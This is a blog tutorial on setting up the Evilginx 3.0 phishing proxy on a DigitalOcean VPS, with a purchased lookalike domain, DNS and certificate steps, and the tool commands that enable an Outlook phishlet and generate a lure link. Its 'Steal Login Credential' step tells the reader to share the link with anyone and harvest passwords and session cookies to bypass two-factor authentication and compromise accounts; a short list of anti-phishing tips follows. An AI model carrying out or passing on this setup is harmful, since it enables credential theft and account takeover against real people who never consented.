Evilginx 3.0 Full Setup & Use in VPS - Linuxndroid

 


Hi Hacker's welcome back my new blog post, in this post we will show you How to Setup Evilgnix 3.0 in VPS & How to Full Configure Evilginx 3.0. So without wasting your time let's start.

Story of  Success Evilgnix 3.0

Evilginx is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.

This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

evilginx2 is made by Kuba Gretzky (@mrgretzky) and it's released under BSD-3 license.

How Evilginx phishing works

Evilginx is a specific tool designed to facilitate phishing attacks, including man-in-the-middle (MitM) phishing. It automates the process of setting up a rogue server that intercepts and manipulates network traffic to deceive users into revealing their login credentials or other sensitive information.

Here's how Evilginx phishing works:

1.Setting up the rogue server: The attacker configures Evilginx to act as a proxy server between the victim and the targeted website. This involves configuring DNS settings and SSL certificates to make the rogue server appear as a legitimate site.

2.Intercepting the traffic: When the victim tries to access the targeted website, Evilginx intercepts the communication and redirects the traffic to the rogue server instead.

3.Mimicking the legitimate website: Evilginx creates a replica of the legitimate website, often using the stolen design elements and logos. The goal is to make the fake site appear indistinguishable from the real one.

4.Capturing login credentials: When the victim enters their login credentials on the fake website, Evilginx captures the information. It can store the credentials for later use or transmit them directly to the attacker.

5.Passing the credentials: After capturing the credentials, Evilginx forwards the data to the legitimate website, allowing the victim to proceed without suspicion. This helps maintain the illusion of a legitimate login process.


Step.1: Evilginx Setup in VPS

to setup the cloud above, first of all you will need a Domain name,. for this you can purchase any cheap domain. for example, I have purchased a domain named from Webhost365 ( exploreinsta.store )




Step.2: Setup Evilginx in Digital Ocean

along with the domain. now you will aslo need a cloud VM. we are going to use Digital Ocean. first of all, you have to add the domain name that you purchased inside digital ocean Domain Tab. 



After adding the domain, you will now get the default Nameserver of digital ocean. you have to copy these nameserver.



You have to copy these nameservers and edit them wherever you have purchased the domain. Nameserver have to be replaced with Digital Ocean's nameserver.




Step.3: Use Evilginx Out-Of-Network

after the domain work is completed, now you will also need a cloud VM. you can do this work from Digital Ocean, here you create a Droplets.




After the droplet is created, now you have to login it. for this, copy the IP address of your Droplet.




to login to the droplet, you can use WSL, Kali Linux, Powershell, inside which ssh is enabled, with the help ssh you can login it.

ssh root@yourip



Step.4: Installing Evilginx in VPS

after login to your VM, now you have to download some files in it as first of all we will need Go language. you can install it with this command.

wget https://golang.org/dl/go1.19.linux-amd64.tar.gz




after the go is downloaded, you can now extract it. we will use targz to extract. to do this, you can copy and paste this command in your terminal.

sudo tar -zxvf go1.19.linux-amd64.tar.gz -C /usr/local/


now you hae to configure the environment variable of go, for this you can use the following command.

echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh


Then use next command.

source /etc/profile.d/go.sh


now you have to install some requirement packages like git make you can install both these packages inside your machine.

sudo apt-get -y install git make


after the packages is installed, now you have to download the Evilginx files of your machine.

git clone https://github.com/BakkerJan/evilginx2.git && cd evilginx2



or
You Can Also Use Evilginx V3, Official Kuba Gretzky Repository.

git clone https://github.com/kgretzky/evilginx2


after coming inside the folder Evilginx, now you have make, so that it will be Build for your machine.

make
sudo make install



Step.5: Domain & Cert for Evilginx

now you have to create TXT records in your domain, because when the Evilginx starts, multiple subdomains are created, so for this you have to create TXT records. to create TXT you have download certbot package in your linux machine.

apt install certbot


create a TXT record using certbot, you can type this command in your linux VM.

Note: Replace My Domain name to Your Domain

certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.exploreinsta.store --email noreply@live.com



now you have to copy this TXT record. after that go to your domain.( digital ocean) pasting these values inside the TXT record and creating it.


after creating the TXT record, now you have to press ENTER. if the message of congratulation comes here, then you will understand that you have paste it correctly.



along with this, now you have to create A records as well, so note carefully in the image given below to create A record.




Now in the last step, you have to create CNAME records in your domain, so that whenever create a new subdomain Evilginx will now show you any error.




Step.6: Start Evilginx 3.0 without error

now you are ready to start the Evilginx, so without delay time, now you can paste this command in your terminal.

sudo evilginx


Now you have to config your IP address and your Domain Name inside Evilginx. then you have to note these steps carefully, for this you can use command or image given below.

config domain exploreinsta.store
config ip yourip
blacklist off


After configuring the domain and IP, now you have to configure whatever templates you want to use for phishing, so for this you can follow command given below.

phishlets hostname outlook exploreinsta.store
phishlets enable outlook



now your domain in SSL certificates have been successfully enabled. this means that you can run a phishing page like that. now you can use below command to run a phishing pages in our domain.

lures create outlook
lures get-url 0


Step.7: Steal Login Credential using Evilgins 3.0

now if you share this link with anyone. here you can see that a login page of outlook has been opened successfully and this attack working is MITM mechanism. if the user login here, then the credentials of all these as well the cookies will be transferred to your Evilginx panel.



The captured session, username, password is all you get to see something like this inside Evilginx. this means that you can compromise a target account successful.



Protect Your Account From Phishing Attack

Securing your account against phishing attacks is crucial for protecting your personal information and preventing unauthorized access. Here are some steps you can take to enhance your account security:

1.Be cautious of email and communication: Exercise caution when opening emails or messages, especially those requesting personal information, login credentials, or urging immediate action. Look for signs of phishing, such as spelling or grammatical errors, suspicious email addresses, or unexpected requests for sensitive data.

2.Verify website authenticity: Before entering your login credentials or personal information, ensure that you are on the legitimate website. Check the URL for any misspellings or variations and look for the secure padlock icon in the address bar indicating a secure connection (HTTPS).

3.Enable multi-factor authentication (MFA): Enable MFA whenever possible for your accounts. MFA adds an extra layer of security by requiring a second form of verification, such as a temporary code sent to your phone or a biometric factor, in addition to your password.

4.Keep your software up to date: Ensure that your operating system, web browsers, and security software are regularly updated with the latest security patches. Updates often include fixes for vulnerabilities that attackers could exploit.

5.Educate yourself about phishing techniques: Stay informed about the latest phishing techniques and tactics used by attackers. Be aware of common red flags and educate yourself on how to spot phishing attempts.

6.Use strong, unique passwords: Create strong, complex passwords that are unique to each of your accounts. Avoid using easily guessable information such as your name, birthdate, or common words. Consider using a reputable password manager to securely store and generate strong passwords.

7.Be cautious of links and attachments: Avoid clicking on suspicious links or downloading attachments from unknown sources. Hover over links to see the actual URL before clicking on them. If in doubt, directly navigate to the website in question through your browser.

8.Regularly monitor your accounts: Keep a close eye on your accounts for any unauthorized activity. Check your transaction history, account settings, and security notifications regularly. If you notice anything suspicious, report it to the relevant service provider immediately.

9.Report phishing attempts: If you receive a phishing email or encounter a phishing website, report it to the appropriate authorities or the affected organization. This helps in taking down fraudulent sites and protecting others from falling victim to the same attack.


Conclusion

the conclusion of this post is how Evilginx work, how MITM proxy work, and how account can be hacked despite having two factor authentication. so I hope you like this post and Enjoy it. and I will see you in the next post Take Care Bye :)


Post a Comment

0 Comments